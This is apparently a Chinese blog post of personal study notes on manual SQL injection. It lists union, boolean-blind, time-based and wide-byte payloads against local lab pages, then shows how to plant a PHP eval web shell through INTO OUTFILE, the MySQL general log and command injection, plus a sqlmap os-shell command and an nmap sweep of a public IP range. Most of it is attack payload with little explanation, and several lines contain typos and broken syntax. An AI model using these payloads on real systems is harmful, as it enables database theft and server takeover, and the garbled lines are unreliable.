手工注入步骤

sql 注入
一、如果发现某一个网站可能存在sql注入(步骤)
1、判断存在什么方式注入(数字、字符)(具体步骤 and 1=1 and 1=2)
 union 联合注入(前提是页面必须要有显示位)
   判断列数:order by 1,2,3,4,5,6.......--+
   判断显示位:(前面的语句必须是错误的)union select 1,2,3 ..... --+
(1)联合注入--列出单个数据库
  eg:http://localhost/sqli-labs-master/Less-2/?id=-1 union select
1,database(),3 --+
     联合注入--列出所有数据库
  eg:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata --+
(2)联合注入--列出单个表名
  eg:





 基于布尔的盲注
 函数:(length(a,b,c) substr(a,b,c) ascii(a,b,c))
  注:a 要截取的字符串
      b 从那个字符开始截取
      c 截取几个字符
(1)布尔注入--获取数据库名
  eg:http://localhost/baji/show3.php?id=16 and substr      (database(),1,1)>'a' --+
      http://localhost/baji/show3.php?id=16 and substr      (substr(database(),1,1))>'100' --+
(2)布尔注入--获取表名
  eg:http://localhost/baji/show3.php?id=16 and substr((select table_name from information_schema.tables where table_schema='baji' limit 0,1),1,1)>'a' --+
      http://localhost/baji/show3.php?id=16 and  ascii(substr((select table_name from information_schema.tables where table_schema='baji' limit 0,1),1,1))>100 --+
(3)布尔注入--获取列名
  eg: http://localhost/baji/show3.php?id=16 and  substr((select column_name from information_schema.columns where table_schema='baji' and table_name='users' limit 0,1),1,1)>'a' --+
  eg: http://localhost/baji/show3.php?id=16 and  ascii(substr((select columxn_name from information_schema.columns where table_schema='baji' and table_name='users' limit 0,1),1,1))>100 --+
(4)布尔注入--获取数据
  eg:http://localhost/baji/show3.php?id=16 and substr((select id from users limit 0,1),1,1)=1 --+
 


延时注入:
第一步:先判断数据库长度
and if(length(database()) = 4 ,sleep(5),1)
第二步:判断数据库名字
and if(substr(database(),3,1) = 'j',sleep(2),1)--+
第三步:判断表的数量
and if (select count(table_name) from information_schema.tables where table_schema ='baji') = 1.sleep(3),1)
第三步:判断表的长度
and if (length((select table_name from information_schema.tables where table_schema = 'baji'limit 0,1)) = 5,sleep(3),1)
第三步:判断表名
and if (substr((select table_name from information_schema.tables where table_schema = 'baji' limit 1,1),1,1)='u',sleep(3),1)--+
第四步:判断字段名
and if (substr ((select column_name from information_schema.columns where table_name = 'users' limit 1,1),1,1)='u',sleep(3),1)--+
第五步:判断数据内容
and if(substr((select username from users limit 0,1),1,5='admin',sleep(3),1)--+
and if(substr((select password from users limit 0,1),1,32)='',sleep(3),1)--+



宽字节注入:gbk编码 addslashes() 字符型
%27 -> %5c%27  '
%df -> %df%5c%27






select '<?php @eval($_POST[1]);?>' into outfile 'D:/phpStudy/WWW/03php/1.php';



1=`echo '123^<^?php eval(^$^_POST[1])?^>' > 1.php`
log拿shell
set global genral_log='on';
set global genral_log_file='D:\\phpStudy\\WWW\baji\\log.php ';
select "<?php @eval($_POST[1]);?>";
python sqlmap.py -u http://192.168.120.251/baji/vul/sql/show1.php?id=1 --os-shell


nmap -p 60001 60.246.186.1-255 | awk 'BEGIN{RS="Nmap scan report for";FS="\n";OFS="\n"}{for(j=1;j<=NF;j++){if($j~/open/){print $1;break}}}'

posted @ 2019-07-15 13:47  wudixiaoherry  阅读(457)  评论(0编辑  收藏  举报